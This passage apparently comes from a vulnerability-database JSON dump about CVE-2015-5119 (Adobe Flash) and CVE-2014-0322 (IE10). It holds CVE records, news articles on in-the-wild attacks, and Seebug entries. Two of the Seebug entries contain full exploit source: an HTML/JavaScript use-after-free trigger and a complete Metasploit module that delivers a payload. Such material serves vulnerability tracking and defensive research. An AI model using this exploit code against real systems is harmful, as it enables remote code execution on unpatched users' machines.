popped on desktop IE. \nCalc.exe should be run as a non-GUI child process in metro IE. \nPayload returns 0 from CreateProcessA(\u201ccalc.exe\u201d) inside Chrome/FF sandbox.\n\non OS X: \nCalculator is launched in FF or standalone Flash Player projector. \nPayload returns 1 from vfork() in Safari sandbox.\n", "modified": "2020-02-13T00:00:00", "id": "AKB:BDC2BC7E-5904-4C44-80ED-E26E3BD1A1A6", "href": "https://attackerkb.com/topics/jLhkepp0Dv/adobe-flash-bytearray-use-after-free", "published": "2015-07-08T00:00:00", "type": "attackerkb", "title": "Adobe Flash ByteArray Use-After-Free", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-04-22T23:51:44", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.", "edition": 7, "cvss3": {}, "published": "2015-07-08T14:59:00", "title": "CVE-2015-5119", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2017-01-20T02:59:00", "cpe": ["cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:17.0.0.188", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:11.2.202.468", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:18.0.0.194", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:13.0.0.292", "cpe:/a:adobe:flash_player:18.0.0.161", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-5119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5119", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:13.0.0.292:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.188:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.468:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.161:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.194:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-22T23:44:02", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via vectors involving crafted JavaScript code, CMarkup, and the onpropertychange attribute of a script element, as exploited in the wild in January and February 2014.", "edition": 5, "cvss3": {}, "published": "2014-02-14T16:55:00", "title": "CVE-2014-0322", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0322"], "modified": "2018-10-12T22:05:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2014-0322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2018-01-27T10:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322"], "description": "[](<https://3.bp.blogspot.com/-HZPlRLNYe7I/Uv8S80E-6pI/AAAAAAAAaIM/yZu0sGsFUzs/s1600/Internet-Explorer-Windows-zero-day-exploit.jpg>)Hackers are using a zero day vulnerability in Microsoft's [Internet Explorer](<https://thehackernews.com/search/label/Internet%20Explorer>) (IE) web browser and targeting US military personnels in an active attack campaign, dubbed as '_Operation Snowman'_.\n\n \n\n\nFireEye Researchers have [discovered](<https://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>) that a U.S. veterans website was compromised to serve a [zero day](<https://thehackernews.com/search/label/zero%20day>) exploit, known as _CVE-2014-0322_, which typically involves the compromise of a specific website in order to target a group of visitors known to frequent it.\n\n \n\n\nFireEye identified drive-by-download attack which has altered HTML code of the website and introduced JavaScript which creates malicious iFrame.\n\n \n\n\n\u201c_A zero-day exploit (CVE-2014-0322) being served up from the U.S. Veterans of Foreign Wars\u2019 website (VFW[.]org). We believe the attack is a strategic Web compromise targeting American military personnel, amid a paralyzing snowstorm at the U.S._\u201d\n\n \n\n\nAccording to FireEye, the zero day CVE-2014-0322 '_vulnerability is a previously unknown use-after-free bug in Microsoft Internet Explorer 10. The vulnerability allows the attacker to modify one byte of memory at an arbitrary address._'\n\n \n\n\nDropped files are digitally signed making it look like a legitimate application and the [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) ultimately allowed them to bypass address space layout randomization (ASLR) by accessing the memory from Flash ActionScript. \n\n \n\n\nBut the exploitation can be migrated if the user is browsing with a different version of IE or has installed Microsoft\u2019s Experience Mitigation Toolkit (EMET).\n\n \n\n\n\"_Based on the overlaps and trade craft similarities, it is believed that the actors behind the campaigns are associated with two previously identified campaigns, Operation Deputy Dog and Operation Ephermeral Hydra, which had previously targeted a number of different industries,_\" FireEye said.\n\n \n\n\nA Microsoft spokesperson confirmed - \u201c_Our initial investigation has revealed that Internet Explorer 9 and Internet Explorer 10 are affected_\".\n", "modified": "2014-02-15T07:18:49", "published": "2014-02-14T20:18:00", "id": "THN:94A6EEF7B58D5DE9CCE68307A6FA2B6F", "href": "https://thehackernews.com/2014/02/cve-2014-0322-internet-explorer-zero.html", "type": "thn", "title": "CVE-2014-0322: Internet Explorer zero-day exploit targets US Military Intelligence", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:19", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2014-0497"], "description": "[](<https://3.bp.blogspot.com/-qllvndzYpes/VZ5mlZ4rLxI/AAAAAAAAjeU/W_yymRKV2Ns/s1600/Hacking-Team-Flash-Zero-Day.jpg>)\n\nThe corporate data leaked in the [recent cyber attack](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) on the infamous surveillance software firm [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>) has revealed that the **_Adobe Flash zero-day _**(CVE-2015-5119) exploit has already been added to several exploit kits.\n\n \n\n\nSecurity researchers at Trend Micro have discovered evidences of the **_Adobe Flash zero-day (CVE-2015-5119) exploit_** being used in a number of exploit kits before the vulnerability was publicly revealed in this week's data breach on the spyware company.\n\n \n\n\nThe successful exploitation of the zero-day Flash vulnerability could cause a system crash, potentially allowing an attacker to take full control of the affected system.\n\n \n\n\n### Adobe Flash Zero-Day Targeted Japan and Korea\n\n \n\n\nAccording to the researchers, the zero-day exploit, about which the rest of the world got access on Monday, was apparently used in limited cyber attacks on **South Korea **and** Japan**.\n\n> _\"In late June, [Trend Micro] learned that a user in Korea was the attempted target of various exploits, including a Flash vulnerability (CVE-2014-0497) discovered last year,\" _Weimin Wu, threat analyst at Trend Micro [wrote](<http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-tied-to-attacks-in-korea-and-japan-on-july-1/>). \n \n_\"Traffic logs indicate the user may have received spear-phishing emails with attached documents\u2026contained a URL for the user to visit. This URL led to a site hosted in the United States, which [included] a Flash exploit, detected as SWF_EXPLOYT.YYKI. This particular exploit targets the zero-day Adobe vulnerability that was disclosed during the [Hacking Team leak](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>).\"_\n\nThe zero-day exploit downloads a Trojan on the target victim's computer, which further downloads several other malicious payloads on the infected system.\n\n \n\n\nResearchers say the zero-day exploit code they came across was very similar to the exploit code revealed as part of the [Hacking Team data breach](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>). This simply means the attack was conducted by someone with the access to the tools and services offered by Hacking Team.\n\n \n\n\nHowever, Adobe has [released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) to address this Adobe Flash zero-day (CVE-2015-5119) vulnerability, thereby advising users to install the update as soon as possible.\n", "modified": "2015-07-09T12:20:50", "published": "2015-07-09T01:20:00", "id": "THN:F6B79957FA6EFD8F9C60F4A8646CCE04", "href": "https://thehackernews.com/2015/07/Hacking-Team-Flash-Zero-Day.html", "type": "thn", "title": "Hacking Team Flash Zero-Day Linked to Cyber Attacks on South Korea and Japan", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-5123", "CVE-2015-5119", "CVE-2015-5122"], "description": "[](<https://1.bp.blogspot.com/-PU0YupNvZZA/VaIFHQRy0zI/AAAAAAAAjgo/0gofhn0tdLM/s1600/flash-player-exploit.jpg>)\n\nAnother Flash zero-day exploit has emerged from the [hundreds of gigabytes of data recently leaked ](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>)from **Hacking Team**, an Italian surveillance software company that is long been accused of selling spying software to governments and intelligence agencies.\n\n \n\n\nThe critical zero-day vulnerability in Adobe Flash is a **Use-After-Free() programming flaw** ([CVE-2015-5122](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>)) which is similar to the [CVE-2015-5119 Flash vulnerability patched](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>) last week and allows an attacker to hijack vulnerable computers.\n\n \n\n\nAdobe says the cyber criminals are apparently already exploiting this vulnerability for which no patch exists yet. However, it's second time in a single week when the company is working on a fix for the zero-day vulnerability in its Flash Player software.\n\n \n\n\n### Flash Zero-Day Flaw in the Wild\n\n \n\n\nThe Exploit code for this flaw is already available online, allowing an attacker to remotely execute malicious code on victims' computers and install malware, Adobe said in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-04.html>) published late Friday.\n\n> \"Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,\" Adobe said.\n\nThe zero-day vulnerability is present in the **_latest Adobe Flash Player version 18.0.0.204 and earlier versions for Windows, Linux and OS X_**.\n\n \n\n\nAdobe credited FireEye researcher** Dhanesh Kizhakkinan **for reporting the vulnerability documented in stolen data leaked from [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>).\n\n \n\n\nTherefore, once again we advise everyone with Flash installed to remove or disable the software until the company patches the critical security bug.\n", "modified": "2015-07-12T07:34:08", "published": "2015-07-11T20:34:00", "id": "THN:81AF218D527E626B7FE15454B68E5FF0", "href": "https://thehackernews.com/2015/07/hacking-flash-player-exploit.html", "type": "thn", "title": "Second Flash Player Zero-day Exploit found in 'Hacking Team' Dump", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:35:26", "description": "No description provided by source.", "published": "2014-03-12T00:00:00", "type": "seebug", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0322)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61771", "id": "SSV:61771", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:37:13", "description": "BUGTRAQ ID: 65551\r\nCVE(CAN) ID: CVE-2014-0322\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nMicrosoft Internet Explorer 10\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u5229\u7528\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4fee\u6539\u4efb\u610f\u5730\u5740\u5904\u7684\u5185\u5b58\u5b57\u8282\uff0c\u7ed3\u5408Flash ActionScript\u83b7\u53d6\u5185\u5b58\u8bfb\u5199\u6743\u9650\uff0c\u8bfb\u51faactionscript\u4e2d\u5bf9\u8c61\u7684\u865a\u8868\u6307\u9488\uff0c\u4ece\u800c\u7ed5\u8fc7ASLR\uff1b\u7136\u540e\u4f7f\u7528ROOP\u6280\u672f\u7ed5\u8fc7DEP\u3002\r\n0\r\nMicrosoft Internet Explorer 10\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5b89\u88c5EMET\u6216\u5347\u7ea7\u5230IE 11\u4ee5\u9632\u6076\u610f\u5229\u7528\u6b64\u6f0f\u6d1e\u3002", "published": "2014-02-17T00:00:00", "type": "seebug", "title": "Microsoft Internet Explorer\u91ca\u653e\u540e\u91cd\u7528\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61455", "id": "SSV:61455", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:01:33", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "MS14-012 Internet Explorer CMarkup Use-After-Free", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86119", "id": "SSV:86119", "sourceData": "\n <!--\r\n MS14-012 Internet Explorer CMarkup Use-After-Free\r\n Vendor Homepage: http://www.microsoft.com\r\n Version: IE 10\r\n Date: 2014-03-31 \r\n Exploit Author: Jean-Jamil Khalife\r\n Tested on: Windows 7 SP1 x64 (fr, en)\r\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\r\n Home: http://www.hdwsec.fr\r\n Blog : http://www.hdwsec.fr/blog/\r\n MS14-012 / CVE-2014-0322\r\n\r\n Generation:\r\n \tc:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf\r\n\r\n Exploit-DB mirror: http://www.exploit-db.com/sploits/32851-AsXploit.as\r\n\r\n-->\r\n\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n\r\n<script>\r\n\r\nvar g_arr = [];\r\nvar arrLen = 0x250;\r\n\r\nfunction dword2data(dword)\r\n{\r\n\tvar d = Number(dword).toString(16);\r\n\twhile (d.length < 8)\r\n\t\td = '0' + d;\r\n\r\n\treturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n}\r\n\r\nfunction eXpl()\r\n{\r\n var a=0;\r\n\r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n\t\r\n\t// Build a new object\r\n\tvar b = dword2data(0x19fffff3);\r\n while (b.length < 0x360)\r\n\t{\r\n\t\t// mov eax,dword ptr [esi+98h]\r\n\t\t// ...\r\n\t\t// mov eax,dword ptr [eax+8]\r\n\t\t// and dword ptr [eax+2F0h],0FFFFFFBFh\r\n\t\tif (b.length == (0x98 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a000010);\r\n\t\t}\r\n\t\t// mov ecx,dword ptr [edx+94h]\r\n\t\t// mov eax,dword ptr [ecx+0Ch]\r\n\t\telse if (b.length == (0x94 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a111111);\r\n\t\t}\r\n\t\t// mov eax,dword ptr [edx+15Ch]\r\n\t\t// mov ecx,dword ptr [eax+edx*8]\r\n\t\telse if (b.length == (0x15c / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x42424242);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tb += dword2data(0x19fffff3);\r\n\t\t}\r\n\t}\r\n \r\n\tvar d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n\t// trigger\r\n\ttry{\r\n this.outerHTML=this.outerHTML\r\n } \r\n\tcatch(e){\r\n\t\t\r\n\t}\r\n\t\r\n CollectGarbage();\r\n\r\n\t// Replace freed object\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n}\r\n\r\n// Trigger the vulnerability\r\nfunction trigger()\r\n{\r\n var a = document.getElementsByTagName("script");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n}\r\n\r\n\r\n\r\n</script>\r\n<embed src=AsXploit.swf width="10" height="10"></embed>\r\n</body>\r\n</html>\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86119"}, {"lastseen": "2017-11-19T15:51:51", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86169", "id": "SSV:86169", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Internet Explorer as used in the wild\r\n on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to\r\n bypass ASLR and finally DEP.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and Exploit in the wild\r\n 'Jean-Jamil Khalife', # Exploit\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-0322' ],\r\n [ 'MSB', 'MS14-012' ],\r\n [ 'BID', '65551' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\r\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 960,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN,\r\n :ua_name => Msf::HttpClients::IE,\r\n :ua_ver => '10.0',\r\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\r\n :flash => /^12\\./\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Feb 13 2014",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def stack_adjust\r\n adjust = "\\x64\\xa1\\x18\\x00\\x00\\x00" # mov eax, fs:[0x18 # get teb\r\n adjust << "\\x83\\xC0\\x08" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << "\\x8b\\x20" # mov esp, [eax] # put esp at stacklimit\r\n adjust << "\\x81\\xC4\\x30\\xF8\\xFF\\xFF" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0322", "AsXploit.swf" )\r\n fd = ::File.open( path, "rb" )\r\n swf = fd.read(fd.stat.size)\r\n fd.close\r\n return swf\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status("Request: #{request.uri}")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status("Sending SWF...")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status("Sending HTML...")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n flash_payload = ""\r\n get_payload(cli,target_info).unpack("V*").each do |i|\r\n flash_payload << "0x#{i.to_s(16)},"\r\n end\r\n flash_payload.gsub!(/,$/, "")\r\n\r\n html_template = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n\r\n <script>\r\n\r\n var g_arr = [];\r\n var arrLen = 0x250;\r\n\r\n function dword2data(dword)\r\n {\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n\r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n }\r\n\r\n function eXpl()\r\n {\r\n var a=0;\r\n\r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n\r\n var b = dword2data(0x19fffff3);\r\n\r\n while (b.length < 0x360) {\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n\r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n\r\n try{\r\n this.outerHTML=this.outerHTML\r\n } catch(e){\r\n\r\n }\r\n\r\n CollectGarbage();\r\n\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n }\r\n\r\n function trigger()\r\n {\r\n var a = document.getElementsByTagName("script");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n }\r\n\r\n </script>\r\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars="version=<%=flash_payload%>" width="10" height="10">\r\n </embed>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\nend\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86169"}, {"lastseen": "2017-11-19T17:30:40", "description": "BUGTRAQ ID: 66028\r\nCVE(CAN) ID: CVE-2014-0303\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c"MSHTML Shim Workaround"\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "published": "2014-03-12T00:00:00", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0303)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0303", "CVE-2014-0322"], "modified": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61756", "id": "SSV:61756", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:39", "description": "BUGTRAQ ID: 66026\r\nCVE(CAN) ID: CVE-2014-0299\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer 